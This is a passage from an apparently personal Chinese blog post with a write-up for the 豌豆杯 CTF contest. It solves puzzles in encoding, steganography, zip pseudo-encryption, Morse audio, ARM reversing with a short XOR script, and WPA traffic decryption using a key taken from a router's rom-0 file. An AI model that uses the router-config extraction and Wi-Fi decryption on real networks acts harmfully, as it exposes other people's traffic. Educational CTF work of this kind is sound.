<h3 id="出航了，出航啦！！"><a href="#出航了，出航啦！！" class="headerlink" title="出航了，出航啦！！"></a>出航了，出航啦！！</h3><p><img src="/2018/10/29/豌豆杯Writeup/对象.jpg" alt="main.html"></p>
<p>打开数据包，发现是对一些网站的请求。根据提示，导出http对象，发现一个与众不同的main.html，点开发现登录密码为：<strong>S04xWjZQWFZ5OQ==</strong>，base64解码即为flag：<strong>KN1Z6PXVy9</strong></p>
<h3 id="IDC密码破解"><a href="#IDC密码破解" class="headerlink" title="IDC密码破解"></a>IDC密码破解</h3><p>这题直到比赛快结束才脑洞出来，js倒过来为sj（手机），且第二位数没有超过4。<br>拿出手机九宫格两个数为一位，如41636331即为good，解出flag为<strong>jsgoodtest</strong></p>
<h3 id="超级密码"><a href="#超级密码" class="headerlink" title="超级密码"></a>超级密码</h3><p>下载password.txt打开，题目给出了md5和salt，写了脚本进行爆破得到flag：<strong>1234567890</strong></p>
<h2 id="网络协议分析"><a href="#网络协议分析" class="headerlink" title="网络协议分析"></a>网络协议分析</h2><h3 id="我是没有感情的thief"><a href="#我是没有感情的thief" class="headerlink" title="我是没有感情的thief"></a>我是没有感情的thief</h3><p>打开数据包发现大量的802.11协议，只存在唯一的http请求，肯定是线索。谷歌了一下rom-0，发现<strong>Rom-0 Configuration Decompressor</strong>，于是导出rom-0上传破解，得到密钥<strong>Rome4040</strong>，于是利用Wireshark进行解密。添加wpa-pwd密钥，发现http请求不唯一了，结合题目提示，过滤数据包<code>http contains CTF</code>，得到答案。</p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="会飞的狗狗"><a href="#会飞的狗狗" class="headerlink" title="会飞的狗狗"></a>会飞的狗狗</h3><p><img src="/2018/10/29/豌豆杯Writeup/二维码.jpg" alt="flag-dog"></p>
<p>打开图片丢进HxD，没有看到明显的flag信息。再丢进StegSolve中，在<strong>Red plane 0</strong>发现二维码，扫描得到<strong>FLAG{Corgi is cutest aniaml on the earth &gt;////////&lt;}</strong></p>
<h3 id="文件类型分析"><a href="#文件类型分析" class="headerlink" title="文件类型分析"></a>文件类型分析</h3><p>一开始以为是熟悉的doc/ppt/xls，结果并不是。只好百度其中的文件<strong>FixedDoc.fdoc</strong>，得知为xps文件</p>
<h3 id="真真假假分不清楚"><a href="#真真假假分不清楚" class="headerlink" title="真真假假分不清楚"></a>真真假假分不清楚</h3><p>下载下来发现压缩包里的txt被加密了，结合题目想到zip伪加密<br>更改第二个<code>50 4B</code>后的加密位<code>50 4B 01 02 3F 00 14 00 01 08</code>，将<code>01</code>改成<code>00</code>即可，<strong>{FLAG:011938d495c36aeab4bfbd897c240d31}</strong></p>
<h3 id="诱人的音乐"><a href="#诱人的音乐" class="headerlink" title="诱人的音乐"></a>诱人的音乐</h3><p>下载下来一段wav文件，播放发现其中藏有一段摩斯电码，打开分析音频文件的<del>Audacity</del><strong>Audition CC</strong>，可以明显看出划线部分的与众不同</p>
<p><img src="/2018/10/29/豌豆杯Writeup/PPAP.jpg" alt="分析音频文件"></p>
<p>得到一段摩斯电码<br><code>.--..--..--.--...--....-.--..---.----.--.--...--.--.-.....--...-.---.....---.-...---.-.-.--.---..--..-.-.-.-----..--.-.-..--..--.---.--..--..-.-.---..-..-----.-</code></p>
<p>但由于音乐中没有分割的迹象，导致一开始以为另有线索。。不过最后发现能解出一个<strong>ag{</strong>，于是把乱码还原成16进制，最终解出<strong>666c61677b6368317074756e655f35337665727d</strong>，转化为字符串即是flag{ch1ptune_53ver}</p>
<h3 id="神秘的文件名"><a href="#神秘的文件名" class="headerlink" title="神秘的文件名"></a>神秘的文件名</h3><p>这其实是本次比赛最难的一道题，也花费了我大量的时间，算是挺有收获的。</p>
<p><img src="/2018/10/29/豌豆杯Writeup/mobile-main.jpg" alt="main函数"></p>
<p>先放进ida逆向看看，要求程序必须有2个参数，<code>sub_A30</code>fork了一个子进程，接着是对输入进行了异或加密。。两个signal处理内存错误，接下来最关键的<code>sub_C14</code>。</p>
<p><img src="/2018/10/29/豌豆杯Writeup/mobile-sub_C14.jpg" alt="sub_C14"></p>
<p>一开始的<code>v3 = 7</code>，接着跳转<code>LABEL_26</code>，整个逆向能否成功就看能否理解这个v3的变化。<br>进行完一次密码判断之后，<code>sub_EAC</code>会改变v3的值。根据题目flag有8位，想到应该是进行八次验证，而case刚好是八次，只需要解出顺序即可。<br>但这时卡壳了，<code>sub_EAC(7 * (v3 + 1), 11);</code>这条指令猜想是反编译出了问题，观察arm汇编又得一条条查命令，花费了大量的时间。。。</p>
<p><code>v3 = 7*(v3+1) - 11*sub_E14(7*(v3+1), 11)</code><br>递推得出<code>7 1 3 6 5 9 4 2</code>，再结合main函数传递的v3=0，成功解出<code>sub_C14</code>的顺序，最后只需要按照顺序异或解出flag即可。附上脚本：</p>
<pre><code class="Python">code = [105,115,101,110,103,97,114,100]
decode = [code[i]^i for i in range(len(code))]
flag = &quot;&quot;

for i in range(len(code)):
    flag += chr(decode[i])

print(flag)
</code></pre>

        
    

    
</div>


                

                <!-- Post Comments -->
                
                    
    <div id="comment" style="padding:10px;" class="vcomment"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<script>
    var GUEST_INFO = ['nick','mail','link'];
    var guest_info = 'nick,mail,link'.split(',').filter(function(item){
        return GUEST_INFO.indexOf(item) > -1
    });
    var notify = 'false' === 'true';
    var verify = 'false' === 'true';
    new Valine({
        el: '.vcomment',
        notify: notify,
        verify: verify,
        appId: "Pd7QkNlL5em8sYC2whTHpXvB-gzGzoHsz",
        appKey: "lk6VWIsj0V9AGarsA0Jy3dCa",
        placeholder: "请开始你的表演",
        pageSize:'10',
        avatar:'identicon',
        lang:'zh-cn',
        guest_info: guest_info
    });
</script>


                
            </div>

            <!-- Post Prev & Next Nav -->
            <nav class="material-nav mdl-color-text--grey-50 mdl-cell mdl-cell--12-col">
    <!-- Prev Nav -->
    
        <a href="/2018/10/31/吵闹/" id="post_nav-newer" class="prev-content">
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_back</i>
            </button>
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            新篇
        </a>
    

    <!-- Section Spacer -->
    <div class="section-spacer"></div>

    <!-- Next Nav -->
    
        <a href="/2018/10/24/DFS-棋盘问题-POJ1321/" id="post_nav-older" class="next-content">
            旧篇
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_forward</i>
            </button>
        </a>
    
</nav>

        </div>
    </div>



                    
                        <!-- Overlay For Active Sidebar -->
<div class="sidebar-overlay"></div>

<!-- Material sidebar -->
<aside id="sidebar" class="sidebar sidebar-colored sidebar-fixed-left" role="navigation">
    <div id="sidebar-main">
        <!-- Sidebar Header -->
        <div class="sidebar-header header-cover" style="background-image: url(/img/Amadeus.png);">
    <!-- Top bar -->
    <div class="top-bar"></div>

    <!-- Sidebar toggle button -->
    <button type="button" class="sidebar-toggle mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon" style="display: initial;" data-upgraded=",MaterialButton,MaterialRipple">
        <i class="material-icons">clear_all</i>
        <span class="mdl-button__ripple-container">
            <span class="mdl-ripple">
            </span>
        </span>
    </button>

    <!-- Sidebar Avatar -->
    <div class="sidebar-image">
        <img src="/img/Persona.png" alt="IceKnife's avatar">
    </div>

    <!-- Sidebar Email -->
    <a data-toggle="dropdown" class="sidebar-brand" href="#settings-dropdown">
        yuanrun777@hotmail.com
        <b class="caret"></b>
    </a>
</div>


        <!-- Sidebar Navigation  -->
        <ul class="nav sidebar-nav">
    <!-- User dropdown  -->
    <li class="dropdown">
        <ul id="settings-dropdown" class="dropdown-menu">
            
                <li>
                    <a href="#" target="_blank" title="Email Me">
                        
                            <i class="material-icons sidebar-material-icons sidebar-indent-left1pc-element">email</i>
                        
                        Email Me
                    </a>
                </li>
            
        </ul>
    </li>

    <!-- Homepage -->
    
        <li id="sidebar-first-li">
            <a href="/">
                
                    <i class="material-icons sidebar-material-icons">home</i>
                
                主页
            </a>
        </li>
        
    

    <!-- Archives  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">inbox</i>
                
                    归档
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
            <li>
                <a class="sidebar_archives-link" href="/archives/2018/10/">十月 2018<span class="sidebar_archives-count">5</span></a>
            </li></ul>
        </li>
        
    

    <!-- Categories  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">chrome_reader_mode</i>
                
                分类
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
                <li>
                <a class="sidebar_archives-link" href="/categories/ACM/">ACM<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/categories/CTF/">CTF<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/categories/随笔/">随笔<span class="sidebar_archives-count">2</span></a>
            </li></ul>
        </li>
        
    

    <!-- Pages  -->
    
        <li>
            <a href="/about" title="关于">
                
                    <i class="material-icons sidebar-material-icons">person</i>
                
                关于
            </a>
        </li>
        
    
        <li>
            <a href="/tags" title="标签">
                
                    <i class="material-icons sidebar-material-icons">bookmark</i>
                
                标签
            </a>
        </li>
        
    

    <!-- Article Number  -->
    
</ul>


        <!-- Sidebar Footer -->
        <!--
I'm glad you use this theme, the development is no so easy, I hope you can keep the copyright, I will thank you so much.
If you still want to delete the copyrights, could you still retain the first one? Which namely "Theme Material"
It will not impact the appearance and can give developers a lot of support :)

很高兴您使用并喜欢该主题，开发不易 十分谢谢与希望您可以保留一下版权声明。
如果您仍然想删除的话 能否只保留第一项呢？即 "Theme Material"
它不会影响美观并可以给开发者很大的支持和动力。 :)
-->

<!-- Sidebar Divider -->

    <div class="sidebar-divider"></div>


<!-- Theme Material -->

    <a href="https://github.com/viosey/hexo-theme-material" class="sidebar-footer-text-a" target="_blank">
        <div class="sidebar-text mdl-button mdl-js-button mdl-js-ripple-effect sidebar-footer-text-div" data-upgraded=",MaterialButton,MaterialRipple">
            主题 - Material
            <span class="sidebar-badge badge-circle">i</span>
        </div>
    </a>


<!-- Help & Support -->
<!--

-->

<!-- Feedback -->
<!--

-->

<!-- About Theme -->
<!--

-->

    </div>

    <!-- Sidebar Image -->
    

</aside>

                    

                    
                        <!-- Footer Top Button -->
                        <div id="back-to-top" class="toTop-wrap">
    <a href="#top" class="toTop">
        <i class="material-icons footer_top-i">expand_less</i>
    </a>
</div>

                    

                    <!--Footer-->
<footer class="mdl-mini-footer" id="bottom">
    
        <!-- Paradox Footer Left Section -->
        <div class="mdl-mini-footer--left-section sns-list">
    <!-- Twitter -->
    

    <!-- Facebook -->
    

    <!-- Google + -->
    

    <!-- Weibo -->
    

    <!-- Instagram -->
    

    <!-- Tumblr -->
    

    <!-- Github -->
    
        <a href="https://github.com/icewind555/" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-github">
                <span class="visuallyhidden">Github</span>
            </button><!--
     --></a>
    

    <!-- LinkedIn -->
    

    <!-- Zhihu -->
    

    <!-- Bilibili -->
    
        <a href="https://space.bilibili.com/680867/#/" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-bilibili">
                <span class="visuallyhidden">Bilibili</span>
            </button><!--
     --></a>
    

    <!-- Telegram -->
    

    <!-- V2EX -->
    

    <!-- Segmentfault -->
    
</div>


        <!--Copyright-->
        <div id="copyright">
            Copyright&nbsp;©&nbsp;<span year=""></span>&nbsp;冰刀
            
        </div>

        <!-- Paradox Footer Right Section -->

        <!--
        I am glad you use this theme, the development is no so easy, I hope you can keep the copyright.
        It will not impact the appearance and can give developers a lot of support :)

        很高兴您使用该主题，开发不易，希望您可以保留一下版权声明。
        它不会影响美观并可以给开发者很大的支持。 :)
        -->

        <div class="mdl-mini-footer--right-section">
            <div>
                <div class="footer-develop-div">Powered by <a href="https://hexo.io" target="_blank" class="footer-develop-a">Hexo</a></div>
                <div class="footer-develop-div">Theme - <a href="https://github.com/viosey/hexo-theme-material" target="_blank" class="footer-develop-a">Material</a></div>
            </div>
        </div>
    
</footer>


                    <!-- Import JS File -->

    <script>lsloader.load("lazyload_js","https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source//js/lazyload.min.js", true)</script>



    <script>lsloader.load("js_js","https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source//js/js.min.js", true)</script>



    <script>lsloader.load("np_js","https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source//js/nprogress.js", true)</script>


<script type="text/ls-javascript" id="NProgress-script">
    NProgress.configure({
        showSpinner: true
    });
    NProgress.start();
    $('#nprogress .bar').css({
        'background': '#29d'
    });
    $('#nprogress .peg').css({
        'box-shadow': '0 0 10px #29d, 0 0 15px #29d'
    });
    $('#nprogress .spinner-icon').css({
        'border-top-color': '#29d',
        'border-left-color': '#29d'
    });
    setTimeout(function() {
        NProgress.done();
        $('.fade').removeClass('out');
    }, 800);
</script>





    <!-- Leancloud -->
    <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
    <script>
        AV.initialize('MCEqzWdfhMj2kkdsPU5DY1C2-gzGzoHsz', 'ljQwSUMjb51ktSehJ7kP65Wo');
    </script>
    <script type="text/ls-javascript" id="leancloud-views-script">
    function showTime(Counter) {
        var query = new AV.Query(Counter);
        $('.leancloud-views_num').each(function() {
            var url = $(this).attr('id').trim();
            query.equalTo('url', url);
            query.find({
                success: function(results) {
                    if (results.length === 0) {
                        var content = '0 ' + $(document.getElementById(url)).text();
                        $(document.getElementById(url)).text(content);
                        return;
                    }
                    for (var i = 0; i < results.length; i++) {
                        var object = results[i];
                        var content = object.get('time') + ' ' + $(document.getElementById(url)).text();
                        $(document.getElementById(url)).text(content);
                    }
                },
                error: function(object, error) {
                    console.log('Error: ' + error.code + ' ' + error.message);
                }
            });
        });
    }

    function addCount(Counter) {
      var Counter = AV.Object.extend('Counter');
      url = $('.leancloud-views_num').attr('id').trim();
      title = $('.leancloud-views_num').attr('data-flag-title').trim();
      var query = new AV.Query(Counter);
      query.equalTo('url', url);
      query.find({
          success: function(results) {
            if (results.length > 0) {
                var counter = results[0];
                counter.fetchWhenSave(true);
                counter.increment('time');
                counter.save(null, {
                    success: function(counter) {
                        var content =  counter.get('time') + ' ' + $(document.getElementById(url)).text();
                        $(document.getElementById(url)).text(content);
                    },
                    error: function(counter, error) {
                        console.log('Failed to save Visitor num, with error message: ' + error.message);
                    }
                });
            } else {
              var newcounter = new Counter();
              newcounter.set('title', title);
              newcounter.set('url', url);
              newcounter.set('time', 1);
              newcounter.save(null, {
                  success: function(newcounter) {
                      console.log('newcounter.get(\'time\')='+newcounter.get('time'));
                      var content = newcounter.get('time') + ' ' + $(document.getElementById(url)).text();
                      $(document.getElementById(url)).text(content);
                  },
                  error: function(newcounter, error) {
                      console.log('Failed to create');
                  }
              });
            }
        },
        error: function(error) {
            console.log('Error:' + error.code + ' ' + error.message);
        }
      });
    }
    $(function() {
        var Counter = AV.Object.extend('Counter');
        if ($('.leancloud-views_num').length === 1) {
            addCount(Counter);
        } else if ($('.post-title-link').length > 1) {
            showTime(Counter);
        }
    });
</script>






   





<!-- UC Browser Compatible -->
<script>
	var agent = navigator.userAgent.toLowerCase();
	if(agent.indexOf('ucbrowser')>0) {
		document.write('<link rel="stylesheet" href="/css/uc.css">');
	   alert('由于 UC 浏览器使用极旧的内核，而本网站使用了一些新的特性。\n为了您能更好的浏览，推荐使用 Chrome 或 Firefox 浏览器。');
	}
</script>

<!-- Import prettify js  -->

    
        
            <script>lsloader.load("prettify_js","https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source//js/prettify.min.js", true)</script>
        
    



<!-- Window Load -->
<!-- add class for prettify -->
<script type="text/ls-javascript" id="window-load">
    $(window).on('load', function() {
        // Post_Toc parent position fixed
        $('.post-toc-wrap').parent('.mdl-menu__container').css('position', 'fixed');
    });

    
        
            $(function() {
                $('pre').addClass('prettyprint linenums').attr('style', 'overflow:auto;');
                prettyPrint();
                })
        
    
    
</script>

<!-- MathJax Load-->


<!-- Bing Background -->


<script type="text/ls-javascript" id="lazy-load">
    // Offer LazyLoad
    queue.offer(function(){
        $('.lazy').lazyload({
            effect : 'show'
        });
    });

    // Start Queue
    $(document).ready(function(){
        setInterval(function(){
            queue.execNext();
        },200);
    });
</script>

<!-- Custom Footer -->



<script>
    var copyrightNow = new Date().getFullYear();
    var textContent = document.querySelector('span[year]')

    copyrightSince = 0000;
    if (copyrightSince === copyrightNow||copyrightSince === 0000) {
        textContent.textContent = copyrightNow
    } else {
        textContent.textContent = copyrightSince + ' - ' + copyrightNow
    }

    (function(){
        var scriptList = document.querySelectorAll('script[type="text/ls-javascript"]')

        for (var i = 0; i < scriptList.length; ++i) {
            var item = scriptList[i];
            lsloader.runInlineScript(item.id,item.id);
        }
    })()
console.log('\n %c © Material Theme | Version: 1.5.6 | https://github.com/viosey/hexo-theme-material %c \n', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-left-radius:5px;border-bottom-left-radius:5px;', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-right-radius:5px;border-bottom-right-radius:5px;');
</script>

                </main>
            </div>
        <script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":false},"log":false});</script></body>
    
</html>
